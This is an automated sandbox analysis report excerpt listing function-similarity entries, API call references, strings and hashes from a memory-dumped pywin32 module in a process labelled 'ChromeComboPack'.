                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_$FreeMem_$AllocCharFormatUnicode_Wide
                                                                                                                                                                                                                                                • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 2830890580-4125661472
                                                                                                                                                                                                                                                • Opcode ID: 78840e5e7e7d228582c0af9e8a9e90980b7b534fab60ec7c7d0f925024459bc3
                                                                                                                                                                                                                                                • Instruction ID: 68745848a26b5104fd432a0024dbabf4669d4c9cd643610233f6024ea0e2d7f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78840e5e7e7d228582c0af9e8a9e90980b7b534fab60ec7c7d0f925024459bc3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4931FF27B0AB42A1EB58CF55E4602797BA0FF88B94F884172DA4D43754DF7CE449C701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_Long$Occurred$DeallocLong_$ClearFormatNumber_Unsigned
                                                                                                                                                                                                                                                • String ID: Unable to convert %s to pointer-sized value
                                                                                                                                                                                                                                                • API String ID: 1465853305-2431006615
                                                                                                                                                                                                                                                • Opcode ID: ad716908c59eab2c18602f6836ab5668689e39de7d630bff23f7a61bcdcb4c0d
                                                                                                                                                                                                                                                • Instruction ID: a36a7b8d305729537b61e60b09e6d8c04eea858677294fedf3f8e2ab0bc7ea0d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad716908c59eab2c18602f6836ab5668689e39de7d630bff23f7a61bcdcb4c0d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D21EE36B0BB42A1EA589F66B9641343BA0FF49FF4F485674DA6E02794DE3CE494C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: State_SwapThread$ErrorFatalFunc$AllocLocalValue
                                                                                                                                                                                                                                                • String ID: Out of memory allocating thread state.$PyWinInterpreterState_Ensure$pywintypes: can not setup interpreter state, as current state is invalid
                                                                                                                                                                                                                                                • API String ID: 4234957216-1490924957
                                                                                                                                                                                                                                                • Opcode ID: fdb1524eb15e5f76735f0c868ecce0d95253c296dba6ef99d2c73a1a3d4f27e4
                                                                                                                                                                                                                                                • Instruction ID: 02280d793ab50beb3e0151222bc8c415ab25171c8fb9af7e5eec8a0327001e9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdb1524eb15e5f76735f0c868ecce0d95253c296dba6ef99d2c73a1a3d4f27e4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0119636B0BB06A2EB9D9B14E8B42792BA0BF58B58F4404B9C54E07764EF3CF559C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: SizeUnicode_$Arg_BuildCharDeallocDecodeErr_FormatFromMessageObjectParseTuple_Value_Widewsprintf
                                                                                                                                                                                                                                                • String ID: COM Error 0x%x$iNzz
                                                                                                                                                                                                                                                • API String ID: 4068968878-4252557710
                                                                                                                                                                                                                                                • Opcode ID: 73344a6563c35f489327fd1dff94f929dc162270d8c375d61b3fe3ba2a73dca4
                                                                                                                                                                                                                                                • Instruction ID: e34b6d73398d04bfbc65c51dd42587f4407a84c1b65db9083792590b01994f42
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73344a6563c35f489327fd1dff94f929dc162270d8c375d61b3fe3ba2a73dca4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C641B823B0AA4296EB688F10F86437A6BA4FF85B94F840171D78E436A4DF3CE545C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 00007FFD8A19C73D
                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 00007FFD8A19C76F
                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 00007FFD8A19C7A2
                                                                                                                                                                                                                                                • PyLong_FromUnsignedLong.PYTHON312 ref: 00007FFD8A19C7DB
                                                                                                                                                                                                                                                • PyLong_FromUnsignedLong.PYTHON312 ref: 00007FFD8A19C7E8
                                                                                                                                                                                                                                                • PyLong_FromUnsignedLong.PYTHON312 ref: 00007FFD8A19C7F5
                                                                                                                                                                                                                                                • PyLong_FromUnsignedLong.PYTHON312 ref: 00007FFD8A19C802
                                                                                                                                                                                                                                                • _Py_BuildValue_SizeT.PYTHON312 ref: 00007FFD8A19C840
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19A170: PyObject_GetAttrString.PYTHON312(?,?,?,?,?,?,?,?,?,00007FFD8A1999ED), ref: 00007FFD8A19A1B4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19A170: _Py_Dealloc.PYTHON312(?,?,?,?,?,?,?,?,?,00007FFD8A1999ED), ref: 00007FFD8A19A213
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$FromLongLong_Unsigned$FileSystem$BuildDeallocSizeValue_$AttrDecodeErr_ErrorFormatFreeLastLocalMessageObjectObject_StringUnicode_
                                                                                                                                                                                                                                                • String ID: FileTimeToSystemTime$lNNNNNNNuu
                                                                                                                                                                                                                                                • API String ID: 198253700-4021486075
                                                                                                                                                                                                                                                • Opcode ID: 1656004b36c4f6e3bc16a1197bf51eb6bde67187bf5cbc8a341de0f46233e049
                                                                                                                                                                                                                                                • Instruction ID: 48febd8c221a954036db2ff242186dbbd5b30e508cd353a9b867878f1dec530b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1656004b36c4f6e3bc16a1197bf51eb6bde67187bf5cbc8a341de0f46233e049
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E416137B0AB41A6E658DF11F8646BA7BA4FB88B80F854072DA9D43765DF3CE445C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$Err_$CharUnicode_Wide
                                                                                                                                                                                                                                                • String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                • API String ID: 3849944921-1275048830
                                                                                                                                                                                                                                                • Opcode ID: 707c45b96feac0c59aa52d167ab1cc9c607e83381189aed7103ba1a0e6978a90
                                                                                                                                                                                                                                                • Instruction ID: 0aae41ff271e50fd186d43f9061f6c10839a95995d8a11032beabc975f2972a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 707c45b96feac0c59aa52d167ab1cc9c607e83381189aed7103ba1a0e6978a90
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D313077B1BA42A1EB58CF15E5A01786BA0FB88B84F9450B2EA4D47754DF2CE849C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyObject_GetAttrString.PYTHON312 ref: 00007FFD8A19BCEC
                                                                                                                                                                                                                                                • PyErr_Clear.PYTHON312 ref: 00007FFD8A19BCFA
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyNumber_Long.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB65
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB73
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB81
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB90
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Clear.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB9B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsUnsignedLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBB3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: _Py_Dealloc.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBC7
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Format.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBE6
                                                                                                                                                                                                                                                • PyCallable_Check.PYTHON312 ref: 00007FFD8A19BD08
                                                                                                                                                                                                                                                • PyObject_CallObject.PYTHON312 ref: 00007FFD8A19BD17
                                                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312 ref: 00007FFD8A19BD29
                                                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312 ref: 00007FFD8A19BD5F
                                                                                                                                                                                                                                                • PyErr_Clear.PYTHON312 ref: 00007FFD8A19BD69
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A19BD80
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$ClearDeallocOccurred$Long_Object_String$AttrCallCallable_CheckFormatNumber_ObjectUnsigned
                                                                                                                                                                                                                                                • String ID: Expected a socket object or numeric socket handle$fileno
                                                                                                                                                                                                                                                • API String ID: 4289764861-511972153
                                                                                                                                                                                                                                                • Opcode ID: 2dd725ec1b4e742cf62ce993a9d7f4ae9effbc43d9565e007f6678adc2bd38c0
                                                                                                                                                                                                                                                • Instruction ID: 5d20b989d502fdb94f3215bc042254565996dddbaf479cf99828b22e4e93192b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd725ec1b4e742cf62ce993a9d7f4ae9effbc43d9565e007f6678adc2bd38c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73212123B0EA4291EA489F26B9641796AA1BF88FD8F4850B1DA4E4B754DE2CE455C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dealloc$Object_$AttrCallImportImport_MethodModuleStringTuple_
                                                                                                                                                                                                                                                • String ID: TimeZoneInfo$utc$win32timezone
                                                                                                                                                                                                                                                • API String ID: 4031171350-3909237026
                                                                                                                                                                                                                                                • Opcode ID: 16713155a17ffb0bafa7ead2b81a85769f0b8c53c87e4ec7d2e06c3fdaf49409
                                                                                                                                                                                                                                                • Instruction ID: b97adaea31ecd6a209af6de90540e1009819f13cd61b85fdef20152cd5d566eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16713155a17ffb0bafa7ead2b81a85769f0b8c53c87e4ec7d2e06c3fdaf49409
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8721C922F0BB5AA1EE5D8F25E9641782BA4BF88B94F4854B9C91D06760EF3CF445C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_Buffer_Err_ParseReleaseSizeStringTuple_
                                                                                                                                                                                                                                                • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                • API String ID: 2872489292-686265896
                                                                                                                                                                                                                                                • Opcode ID: 2255fffdc18b28b1a602e145245e94887b14e5a616429a3cfb698ddea7cb3a63
                                                                                                                                                                                                                                                • Instruction ID: c1154d494e5f87da1f0fa27e6a522223c38d977aff87a95a01aec2b23b075fb5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2255fffdc18b28b1a602e145245e94887b14e5a616429a3cfb698ddea7cb3a63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A31F037B0EA42A5EA68CF15E8602756BA0FFC4B88F985171DA8D436A4DF3CF504C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFatalFuncValue$AllocLocalState_Thread
                                                                                                                                                                                                                                                • String ID: Can not setup thread state, as have no interpreter state$Out of memory allocating thread state.$PyWinThreadState_Ensure
                                                                                                                                                                                                                                                • API String ID: 1925565299-3250566352
                                                                                                                                                                                                                                                • Opcode ID: 81a627f479a4f4e6372c1f023ffb07668953bc081b3a4ff38f78ee2adcd5121e
                                                                                                                                                                                                                                                • Instruction ID: 96547851d65660323678bbebbe8619d795e5027ba2a2922635b97a976db7f349
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81a627f479a4f4e6372c1f023ffb07668953bc081b3a4ff38f78ee2adcd5121e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2110576B0BA02A2EA599F14ECA42742B60FF54B48F8404B5C50D57264EF3CF99AC700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Buffer_Err_Release$BufferFormatFreeMem_Object_String
                                                                                                                                                                                                                                                • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                • API String ID: 1675121998-686265896
                                                                                                                                                                                                                                                • Opcode ID: 36a83c9242e7e84fc00db936510af87f0f82ecc5178088cf441a11d5fdfb1027
                                                                                                                                                                                                                                                • Instruction ID: 38dec75a2584f9d9ac56104e0744bda20692e159c6331f56666b91571c5c1175
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36a83c9242e7e84fc00db936510af87f0f82ecc5178088cf441a11d5fdfb1027
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79311023B0AA52A1EB5C8F15E4603786760FB44F58F4850B1DA5E43698DF7CF995C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeallocObject_$AttrBuildCallSizeStringTuple_Value
                                                                                                                                                                                                                                                • String ID: (s)$strftime
                                                                                                                                                                                                                                                • API String ID: 4125559156-1254993691
                                                                                                                                                                                                                                                • Opcode ID: f271ca0000b76510a5b7333935f7d38f84b61be0f30e414fcb8fdb346cffc6a8
                                                                                                                                                                                                                                                • Instruction ID: c13095f91a9796d6bbb93a66fd933fb5b1cb1d00560375f06f1fba36d322fc32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f271ca0000b76510a5b7333935f7d38f84b61be0f30e414fcb8fdb346cffc6a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1110A26B0AB52A1EE598F56A9A41756AA1FF88FC0F4C5474D94E07B64EF2CE400C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                • String ID: (ii)$:GetSecurityDescriptorControl$GetSecurityDescriptorControl$GetSecurityDescriptorControl - invalid sd
                                                                                                                                                                                                                                                • API String ID: 1292091245-2499011972
                                                                                                                                                                                                                                                • Opcode ID: 899b441f1e08e56cc03e74a8b13421d7ce615e6febe98fda2992056ca5000227
                                                                                                                                                                                                                                                • Instruction ID: 34a0ab95c7f41b7d97e585f4caa3a87ce635693e52b1a912dcd9a8b7024c034f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 899b441f1e08e56cc03e74a8b13421d7ce615e6febe98fda2992056ca5000227
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD01A16BF1A542A2EB4C8F22A8601B62760FF88B40F8C5075DA4E82654EF3CE595C700
